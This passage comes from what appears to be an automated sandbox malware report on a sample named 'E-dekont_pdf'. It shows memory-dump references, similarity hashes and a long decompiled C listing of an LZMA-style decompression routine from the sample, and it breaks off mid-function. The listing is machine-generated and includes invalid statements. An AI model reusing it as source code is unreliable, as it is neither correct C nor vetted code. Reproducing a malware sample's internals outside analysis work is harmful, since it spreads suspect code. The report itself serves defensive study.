                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: nsa
                                                                                              • API String ID: 1716503409-2209301699
                                                                                              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                              • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                              • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_push("true");
									_pop(_t579);
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__ebx = __edx + 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
